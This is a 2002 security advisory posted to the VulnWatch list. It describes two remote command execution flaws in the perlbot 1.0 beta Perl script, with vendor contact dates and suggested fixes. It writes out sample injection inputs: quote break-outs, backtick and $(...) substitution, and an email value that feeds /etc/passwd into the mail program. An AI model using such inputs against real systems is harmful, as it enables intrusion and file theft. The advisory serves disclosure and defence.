[VulnWatch] SCAN Associates Advisory: madhater perlbot 1.0 beta - Remote Command Execution

From: guejez (guejez@scan-associates.net)
Date: 10/18/02


From: "guejez" <guejez@scan-associates.net>
To: <vulnwatch@vulnwatch.org>
Date: Fri, 18 Oct 2002 19:42:17 +0800

perlbot 1.0 beta - Remote Command Execution
Discovered By guejez of scan-associates.net

 About perlbot:
 ------------------
 [quote from perlbot website]

 ""

 [/quote from perlbot website]

 perlbot is avaliable at http://stigmata.gothcafe.com/~madhater

 Vulnerable (tested) Versions:
 --------------------
 Perlbot version 1.0 beta on SuSe 7.3

 Vendor Contact:
 ----------------
 07-22-02 - Emailed myneid ^^at^^ gothcafe.com Alerted him of this
vulnerability
 07-22-02 - Recieved email confirming vulnerabilties and stating fixes could
be
            in new version.

 Vulnerabilities:
 ----------------
 -- Command Execution

 1. Due to no input filtering and a call to the shell the script could be
used to
    execute any command it has permission to.

    A more detailed explaination:

 The script does not limit the characters sent to the shell from user input.
 The problem is in this line:

 foreach(`/bin/echo "$word" | /usr/local/bin/ispell -a`)

 Which allows an attacker to "break out" of the quotes and issue any command
 they wish by doing something like anything";cmd. Other abuses could be
issuing
 commands with `cmd` and $(cmd) or \xxx where xxx is the octal value of any
 character. Some form of user input filtering must be used.

 2. Due to no input filtering and a bad open() call when the script attempts
to send
    email it is possible to execute commands.

    A more detailed explaination:

 The script attempts to send an email to the user. It takes the user's
email
 address and passes it to the shell as an argument to the mail program:

 open (MAIL,"| $sendmail $recipient") || die $!;

 This means things like hacker@scan-associates.net < /etc/passwd could be
used as
 an email address to get any file from the system the script has permission
to
 read. Or command execution is possible with hacker@scan-associates.net ;
cmd.
 Inorder to prevent this simply take the $recipient value out of the shell
call.

 Proof Of Concept:
 -----------------
 No proof of concept will be givin for these issues.

 Fix:
 ----
 According to the author a fix could be in a new verison of the script. The
script's
 homepage was down at the time of this advisory, so here is the suggested
fix. Replace
 the following line:

 my $word=$';

 With:

 my $word=$';
 $word =~ s/[^\w]//g;

 And replace the following line:

 open (MAIL,"| $sendmail $recipient") || die $!;

 With:

 open (MAIL,"| $sendmail -t") || die $!;

 Thanks:
 -------
 irc.efnet.org #vuln - various people helping with perl security issues.
 pokleyzz, sk , and all of scan-associates.net

--------------------------------------------------------------------------
http://www.scan-associates.net/



Relevant Pages